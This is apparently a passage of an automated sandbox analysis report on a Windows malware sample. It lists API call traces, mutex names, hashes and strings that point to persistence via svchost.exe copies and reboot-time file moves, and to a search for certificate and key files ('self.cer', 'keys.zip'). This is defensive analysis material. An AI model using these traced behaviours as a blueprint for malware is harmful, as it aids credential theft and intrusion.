                                                                                                                                                                                                            • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorObjectPointerTokenWrite$CloseCompatibleCurrentFreeHandleOpenProcessReleaseThread$AdjustAllocBitmapBitsChangeConvertCursorDeleteErrorFindInfoInformationLastLocalLookupNamedNotificationPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                            • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 2969484848-808120212
                                                                                                                                                                                                            • Opcode ID: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                            • Instruction ID: 7ccd0a5ff0d4d5a762415c6fb49a14866f6acfd14a00cb9e85bb6be09aae408b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6914BB2545300AFE3609F64DC88EABBBECEFC8785F508A1DF68597240D7709905CB62
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774), ref: 02BCF9E8
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA29
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCFA2F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCFA37
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02C0DDC8), ref: 02BCFA46
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCFA4D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA89
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02C0DDC8), ref: 02BCFA94
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774,?,?), ref: 02BCFAD6
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB11
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCFB17
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCFB1F
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB2E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCFB35
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB63
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCFB69
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCFB71
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB80
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCFB87
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCFB91
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCFBC7
                                                                                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 02BCFC41
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BCFC52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 02BCFC6F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCFC76
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCFC88
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCFC98
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCAA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BCFCAD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCBA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BCFCBD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                            • String ID: Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\*.bk$keys\$path.txt
                                                                                                                                                                                                            • API String ID: 959110331-3127126710
                                                                                                                                                                                                            • Opcode ID: b9282ae7e1ce46db3fefa15dd8aec3ea006fdeb9739a456987e953bd44b45b0f
                                                                                                                                                                                                            • Instruction ID: 5e8e7231d5f322158e474f43c9312e40ee0a3bcf937641c87bc4bef6abcdcdc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9282ae7e1ce46db3fefa15dd8aec3ea006fdeb9739a456987e953bd44b45b0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE91F730E407469FEB214F78A858BABBFE5EF4A740F6485DAE986D7340DB708510C7A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: IsUserAnAdmin.SHELL32 ref: 02BB7C8A
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CC1
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CD9
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,76F8F380), ref: 02BB7CFB
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,76F8F380), ref: 02BB7D21
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,76F8F380), ref: 02BB7DAD
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,76F8F380), ref: 02BB7DB4
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8105
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BB8112
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8124
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB812D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB8145
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB8157
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8162
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8165
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8172
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8175
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8182
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8185
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8192
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8195
                                                                                                                                                                                                            • SetCaretBlinkTime.USER32(000000FF), ref: 02BB81A7
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02BB81D5
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(00000000,69889110a,69889191a), ref: 02BB8205
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8215
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8218
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8225
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8228
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8235
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8238
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8245
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8248
                                                                                                                                                                                                            • Sleep.KERNEL32(00001388,69889110a,69889191a), ref: 02BB8253
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02BB8285
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 02BB82A5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB82BD
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB82CF
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB82F2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB830C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                            • String ID: 69889110a$69889191a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                            • API String ID: 2871222221-139645038
                                                                                                                                                                                                            • Opcode ID: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                            • Instruction ID: 831aca38907dfe62bddd1553c83d58595776b516f6e71ab4e18650b822dc7f69
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D351E331A817016BE7726B749C4CFBB376DEF44B95F444A94FA599B180DBB0C810CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCC86F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCC8A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCC8E7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCC8F1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCC8F9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCC90A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCC911
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,crypto), ref: 02BCC923
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.cer), ref: 02BCC936
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.pub), ref: 02BCC947
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCC992
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCC99F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                            • API String ID: 3980609930-1944651917
                                                                                                                                                                                                            • Opcode ID: 6f5bf59cba9a7d9ab3a006bd8b89ed20e7ec42797ebadf6933976d5de03d078e
                                                                                                                                                                                                            • Instruction ID: 095c5035698c4be66ea2500776de022db699ea355080c5e341bc2693ee7e40a7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f5bf59cba9a7d9ab3a006bd8b89ed20e7ec42797ebadf6933976d5de03d078e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10917631D402099FDB26CB789858BEA7FE8EF59740F2445DEEA4ED7240DB709944CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                            • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 3422789474-2746444292
                                                                                                                                                                                                            • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                            • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                              • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                            • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                            • API String ID: 4049655197-3112416296
                                                                                                                                                                                                            • Opcode ID: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                            • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCEB4E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C), ref: 02BCEB7A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCEBBD
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCEBC3
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCEBCB
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCEBDC
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCEBE3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCEC1B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCEC28
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C,?,?), ref: 02BCEC67
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BCECA5
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCECAC
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCECB4
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BCECC5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCECCC
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCED06
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCED31
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02BCED55
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 02BCED72
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCED79
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCED8B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCED9C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDAB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BCEDAE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDBB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BCEDBE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 1472338570-1285538368
                                                                                                                                                                                                            • Opcode ID: 0b0edaa46401c7932b3feaae79a34b0e1d9d395bb4a817afcd491333b93b6d5a
                                                                                                                                                                                                            • Instruction ID: 9f136754a1750cd4c54a7908d430c77418d29cd0ca2011ccfc825222ceeef525
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b0edaa46401c7932b3feaae79a34b0e1d9d395bb4a817afcd491333b93b6d5a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D7124309407559FDB718B38D858BEB7BE8EF45740F6489C8EA86D7240DB70DA44CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                            • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                            • API String ID: 3942648141-1626032180
                                                                                                                                                                                                            • Opcode ID: 3a6e4deee6ebf492969637524cf6f71780ce01b2872132ab1a9491f51674e5de
                                                                                                                                                                                                            • Instruction ID: 969f26b98f297806455ff3e67c4735cdf336fd5648b271f21f101e84d55a0c1d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a6e4deee6ebf492969637524cf6f71780ce01b2872132ab1a9491f51674e5de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DD124B1A042419FC7228F388C947B6BFE6EF46204B6D46EDE985CB342E736D509CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
